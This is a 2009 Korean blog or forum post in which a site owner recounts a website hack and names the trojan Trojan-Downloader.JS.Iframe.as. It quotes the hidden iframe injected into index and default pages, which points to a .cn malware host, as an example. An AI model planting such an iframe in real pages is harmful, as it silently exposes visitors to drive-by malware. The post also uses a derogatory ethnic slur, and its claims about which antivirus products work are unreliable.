2009-06-04 오전 12:40:15 Hit. 4430
최근에 바이러스들이 진화를 해서 일반모드에서는 스텔스 기능으로 숨어버려서 실시간 감시에도 안잡힙니다.
저도 이것때문에 며칠 전에 컴퓨터를 포맷했습니다. (스텔스 기능이 있는 신종 바이러스가 알약까지 감염시켰더군요.)
따라서 무조건 안전모드 (부팅시 F8번 누르고 메뉴중에서 1번 선택)로 들어가서 검사하시면 실시간감시에서 보이지 않던 바이러스가 수십 개가 나올 겁니다. 아무튼 5년째 사용중인 구형 컴퓨터를 포맷했더니 인터넷 속도가 2배나 빨라졌습니다.
그리고 오전에 홈페이지 해킹 사고가 있었습니다.
3월달에 이어 2번째 해킹사고로 index.html 파일을 비롯하여 자주 접근하는 파일들에 악성코드가 삽입이 되었습니다. 로그를 살펴보니 이번에도 중국 놈들 짓이더군요.
중국해커가 회원가입을 해서 특정 게시판에 바이러스가 심어진 파일을 올린 것 같습니다. 인증메일 시스템을 없애서 그런지 보안이 한층 더 약해진 듯...
해킹 커뮤니티들을 돌아다니면서 수집한 정보를 토대로 보안에 취약한 파일들을 수정했는데, 더 이상 해킹이 없었으면 하네요.
결국 구글링을 통해서 문제의 바이러스를 찾아냈습니다.
홈페이지 파일들을 위변조 시킨 범인은 Trojan-Downloader.JS.Iframe.as 더군요.
======================================================================== Trojan-Downloader.JS.Iframe.as (트로이목마 바이러스, 악성코드) ========================================================================
[증상] 루트\hosting\" 의 폴더에 존재하는 모든 index.html, index.htm, index.asp, default.html, default.htm, default.asp, default.aspx, index.aspx, main.asp, main.html, main.htm 위 파일들의 마지막 부분에 악성코드가 담긴 iframe을 삽입시킵니다..
(특정 도메인.cn 으로 끝나는 중국 사이트의 주소가 삽입된 경우가 대부분임)
예:) iframe src="http://superlottry.cn:8080/ts/in.cgi?pepsi41" width=125 height=125 style="visibility: hidden"
위와 같은 악성코드가 삽입된 홈페이지에 접근하면 자기도 모르는 사이에 PC가 해커들의 경유지로 사용 됩니다. [해결방법] 카스퍼스키와 NOD32 등등 외국산 백신으로만 검사 및 치료가 가능합니다.
(알약, V3는 안습이군요...당장에 카스퍼스키로 바꿔야겠습니다.)
불량게시글신고
·댓글